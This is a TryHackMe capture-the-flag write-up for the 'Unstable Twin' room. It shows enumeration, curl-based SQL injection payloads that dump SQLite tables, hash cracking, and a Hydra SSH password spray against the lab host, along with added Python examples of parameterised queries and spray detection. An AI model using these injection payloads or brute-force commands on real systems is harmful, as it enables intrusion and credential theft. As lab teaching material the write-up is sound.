Unstable Twin Write-Up (TryHackMe)

kaarb0
5 min read · Jun 16, 2021


A services-based room: extracting information from HTTP services and finding the hidden messages. This room was created by trb143.

Twins (1988)

Based on the Twins film, find the hidden keys.

Julius and Vincent have gone into the SERVICES market to try and get the family back together.
They have just deployed a new version of their code, but Vincent has messed up the deployment!

Can you help their mother find and recover the hidden keys and bring the family and girlfriends back together?

Enumeration

The first thing I did was to scan the IP with NMAP to learn more about the host and the technologies it was using.

nmap -sC -sV <IP> -Pn
  • -sC : Equivalent to --script=default
  • -sV : Probe open ports to determine service/version info
  • -Pn : Treat all hosts as online (skip host discovery)

There is SSH on port 22 and a web server on port 80.

  • SSH on port 22 runs OpenSSH 8.0
  • HTTP on port 80 runs Nginx 1.14.1

After discovering this, I decided to see what the website looked like on port 80.

http://<IP>:80/

Mmmh, I was a little disappointed, so I launched Gobuster to do a little more enumeration.

gobuster dir -u http://<IP>/ -w /usr/share/dirbuster/directory-list-lowercase-2.3-medium.txt
  • dir : Enumerate directories
  • -u : The URL to enumerate
  • -w : The wordlist to use

As soon as I saw the /info page, I decided to check it out.

http://<IP>:80/info

The login API needs to be called with the username and password form fields fields. It has not been fully tested yet so may not be full developped and secure

After further enumeration, I opened Burp Suite to try to learn more about the API.

Repeater in Burp Suite

With another request…

Repeater in Burp Suite

After multiple requests, it sent me back different build numbers and different server names.

Remember “Vincent has messed up the deployment!”? At this point I knew I was on the right track…

I needed to login with the API. So I tried this:

http://<IP>/api/login

Bingo, that’s what I was looking for. I had used the GET method, but a login form needs the POST method, so here’s what I did:

Repeater in Burp Suite

The username or password passed are not correct.

SQL Injection

After several attempts at SQL injection through Burp Suite, I tried with curl.

curl -X POST -d "username=admin' OR 1=1 -- &password=test" http://<IP>/api/login
  • -X : The HTTP method to use
  • -d : HTTP POST data (sent as form fields)

That’s how I was able to discover the users.

After this little victory, I tried to go further…

curl -X POST -d "username=admin' UNION SELECT username,password FROM users -- &password=test" http://<IP>/api/login

I then extracted the table names from sqlite_master:

curl -X POST -d "username=admin' UNION SELECT 1,tbl_name FROM sqlite_master -- -&password=test" http://<IP>/api/login

I saw 3 tables :

  • notes
  • sqlite_sequence
  • users

When I tried to dump the users table, it gave me a 500 error:

curl -X POST -d "username=admin' UNION SELECT 1,users FROM users -- -&password=test" http://<IP>/api/login

So I dumped notes instead:

curl -X POST -d "username=admin' UNION SELECT 1,notes FROM notes -- -&password=test" http://<IP>/api/login

I have left my notes on the server. They will me help get the family back together. My password is **********************************
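To show the defect behind these payloads from the other side, here is an added example (not code from the room or the write-up) that reproduces the login query against a constructed in-memory SQLite database: the vulnerable form splices the username into the SQL text, the hardened form binds it as a parameter. Table and column names mirror the ones listed above; the rows and hash placeholders are made up.

```python
import sqlite3

# Constructed in-memory stand-in for the API's SQLite backend: the same table
# names the write-up lists (users, notes, and sqlite_sequence via AUTOINCREMENT),
# filled with made-up rows.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY AUTOINCREMENT,
                            username TEXT, password TEXT);
        CREATE TABLE notes (id INTEGER PRIMARY KEY, notes TEXT);
        INSERT INTO users (username, password) VALUES ('mary_ann', 'hash-placeholder-1');
        INSERT INTO users (username, password) VALUES ('julius',   'hash-placeholder-2');
        INSERT INTO notes (notes) VALUES ('constructed note text');
    """)
    return conn

def login_vulnerable(conn, username, password):
    # The defect the write-up exploits: form values are pasted into the SQL
    # text, so a quote in the username closes the literal and whatever follows
    # (OR 1=1, a UNION, a -- comment) is parsed as SQL.
    sql = ("SELECT username, password FROM users "
           "WHERE username = '%s' AND password = '%s'" % (username, password))
    return conn.execute(sql).fetchall()

def login_safe(conn, username, password):
    # The fix: a fixed statement with bound parameters. SQLite receives the
    # whole username as a single string value; quotes and comment markers
    # are just characters in that value.
    sql = ("SELECT username, password FROM users "
           "WHERE username = ? AND password = ?")
    return conn.execute(sql, (username, password)).fetchall()

def compare(username, password="test"):
    """Row counts (vulnerable, safe) for the same submitted form values."""
    conn = build_db()
    return (len(login_vulnerable(conn, username, password)),
            len(login_safe(conn, username, password)))
```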

I used hash-identifier to identify the type of hash I had been given.

hash-identifier

SHA-512

The first thing I did after discovering the hash type was to check the online databases. I went to CrackStation, which gave me the password.

CrackStation

To find out who the password belonged to, I created a list of usernames from the ones retrieved earlier and brute-forced SSH with Hydra.

cat users.txt
hydra -L users.txt -p ****** <IP> ssh -t 4
  • -L : List of usernames
  • -p : The password
  • -t : Number of threads

I was then connected to SSH with mary_ann, and got the user flag.

User Flag
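The Hydra step above is a password spray (one password tried against a list of usernames), and that shape is easy to spot in sshd logs. As an added example, not part of the original write-up, the following parses constructed auth-log lines and flags any source that failed against several distinct usernames, noting whether the same source then logged in successfully; hostnames, addresses and usernames in the sample are made up.

```python
import re
from collections import defaultdict

# Constructed sshd auth log sample shaped like the trail a one-password spray
# over a username list leaves behind (many users, one attempt each, one
# source), followed by an ordinary login from elsewhere. All values are made up.
SAMPLE_LOG = """\
Jun 16 10:00:01 twin sshd[1201]: Failed password for invalid user julius from 10.10.14.7 port 40211 ssh2
Jun 16 10:00:01 twin sshd[1202]: Failed password for invalid user vincent from 10.10.14.7 port 40212 ssh2
Jun 16 10:00:02 twin sshd[1203]: Failed password for invalid user tom from 10.10.14.7 port 40213 ssh2
Jun 16 10:00:02 twin sshd[1204]: Failed password for invalid user anna from 10.10.14.7 port 40214 ssh2
Jun 16 10:00:03 twin sshd[1205]: Accepted password for mary_ann from 10.10.14.7 port 40215 ssh2
Jun 16 10:05:40 twin sshd[1300]: Failed password for mary_ann from 192.168.1.20 port 51000 ssh2
Jun 16 10:05:45 twin sshd[1301]: Accepted password for mary_ann from 192.168.1.20 port 51001 ssh2
"""

# Matches both "Failed password for invalid user X" and "Failed/Accepted
# password for X" forms that OpenSSH writes.
LINE_RE = re.compile(
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def parse_auth_log(text):
    """Yield (result, user, src) for every sshd password line that matches."""
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            yield m.group("result"), m.group("user"), m.group("src")

def find_sprays(text, min_users=3):
    """Return {src: (failed_users, accepted_users)} for every source that
    failed against at least min_users distinct usernames. A spray is many
    usernames with few tries each; a source whose accepted_users is non-empty
    got in after spraying and is the case to act on first."""
    failed = defaultdict(set)
    accepted = defaultdict(set)
    for result, user, src in parse_auth_log(text):
        (accepted if result == "Accepted" else failed)[src].add(user)
    return {src: (sorted(failed[src]), sorted(accepted[src]))
            for src in failed if len(failed[src]) >= min_users}
```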

Final Flag

cat server_notes.txt

Now you have found my notes you now you need to put my extended family together. We need to GET their IMAGE for the family album. These can be retrieved by NAME. You need to find all of them and a picture of myself!

As soon as I read this note, I knew it wasn’t going to be a classic elevation of privilege.

I immediately realized that the directory I had found earlier with Gobuster (/get_image) was going to be useful now.

http://<IP>/get_image?name=********

After finding the first image, I decided to look for messages hidden inside it; for that I used steghide.

steghide extract -sf ******.gif
  • -sf : Select stego file & extract data from it
cat ******.txt

You need to find all my children and arrange in a rainbow!

All I had to do was extract the txt file from the photo of each of the other family members and arrange the answers in rainbow colour order, which gave me a string that could easily be decoded with CyberChef.

cat ****

After decoding the string, I got the Final Flag.

PWNED !!!

Thank you for reading this write-up, I hope it helped you.
